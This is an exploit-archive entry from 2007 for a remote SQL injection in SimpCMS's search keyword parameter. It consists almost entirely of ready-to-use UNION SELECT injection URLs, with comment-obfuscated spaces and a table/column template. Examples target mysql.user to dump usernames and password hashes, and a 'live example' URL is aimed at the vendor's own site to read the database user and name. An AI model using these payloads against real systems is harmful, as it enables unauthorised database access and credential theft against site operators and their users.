SimpCMS <= all (keyword) Remote SQL Injection Vulnerability

2007-09-16T00:00:00
ID 1337DAY-ID-2145
Type zdt
Reporter Cold Zero
Modified 2007-09-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
SimpCMS <= all (keyword) Remote SQL Injection Vulnerability
===========================================================



SimpCMS <= all Remote SQL Injection Vulnerability


Script : http://www.simpcms.com/


====================================

Exploit :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*

OR

/index.php?site=search

in search area insert your query

$query = 1)'/**/union/**/select/**/0,1,2,3,$COLUMN,5,6/**/from/**/$TABLE/*

$TABLE = "categories" OR "news" OR "mysql.user" OR "mysql.db" OR 
"information_schema.tables"

$COLUMN = "name" OR "id" OR "username" OR "password"

Examples :

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

1 ) From $TABLE categories :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

2 ) From $TABLE news :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,id,5,6/**/from/**/news/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

3 ) From $TABLE mysql.user :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,username,5,6/**/from/**/mysql.user/*
/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,password,5,6/**/from/**/mysql.user/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

====================================

Live Example :

http://www.simpcms.com/medium/normal/index.php?site=search&keyword=1)'/**/union/**/select/**/0,user(),database(),3,name,5,6/**/from/**/categories/*



#  0day.today [2018-01-05]  #